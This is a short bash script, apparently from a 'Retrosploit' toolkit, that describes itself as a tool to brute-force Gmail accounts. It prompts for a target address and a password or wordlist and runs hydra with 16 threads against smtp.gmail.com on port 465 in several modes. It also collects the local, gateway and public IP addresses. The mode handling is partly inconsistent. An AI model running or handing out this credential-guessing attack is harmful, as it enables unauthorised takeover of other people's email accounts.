#!/bin/bash

#!/bin/bash

#=========================#
#     Colors module       #
#=========================#

def="\e[1;"
white="${def}97m"
red="${def}91m"
cyan="${def}96m"
magenta="${def}95m"
green="${def}92m"
yellow="${def}93m"
reset="${def}39m"
blink="${def}5m"
Hidden="${def}8m"
under="${def}4m"
blinkre="${def}25m"
rehide="${def}28m"
pc="${yellow}[${red}PC Only${yellow}]${green}"

#=============================#
#   Get gateway and local ip  #
#=============================#

gate=`netstat -r | grep "default" | awk {'print $8'}`
llp=`hostname -I | cut -d' ' -f1`
public=`curl ifconfig.me 2>&-`

version="1.0"
auth="Retr0"
mac=`</sys/class/net/eth0/address`
logo=`figlet Retrosploit -f chunky.flf | lolcat`

#=========== END MODULES ============#

figlet GBrute

echo -e ":: Description ::\n"
echo -e "This tool can brute force gmail account.\n"

echo -e "This tools required less secure apps : ${red}OPEN\n$reset"

read -p "Select single / multi / mix mode:> " options && echo

if [ $options == "single" ] || [ $options == "Single" ]; then

read -p "Target's Gmail:> " target
read -sp "Password:> " pwd
sleep 0.8

hydra -l $target -p $pwd -S -s ns -V -t 16 -s 465 smtp.gmail.com smtp && sleep 0.8

elif [ $options == "multi" ] || [ $options == "Multi" ]; then

read -p "Gmail file:> " target
read -p "Wordlist File:> " pwd
sleep 0.8

hydra -L $target -P $pwd -S -s ns -V -t 16 -s 465 smtp.gmail.com smtp && sleep 0.8

elif [ $options == "mix" ]; then

read -p "Target's Gmail:> " target
read -p "Wordlist File:> " pwd
sleep 0.8

hydra -l $target -P $pwd -S -s ns -V -t 16 -s 465 smtp.gmail.com smtp && sleep 0.8

elif [ $options == "Mix" ]; then
read -p "Gmail file:> " target
read -sp "Password:> " pwd
sleep 0.8

hydra -L $target -p $pwd -S -s ns -V -t 16 -s 465 smtp.gmail.com smtp && sleep 0.8

else

sleep 0.8 && bash gbrute

fi


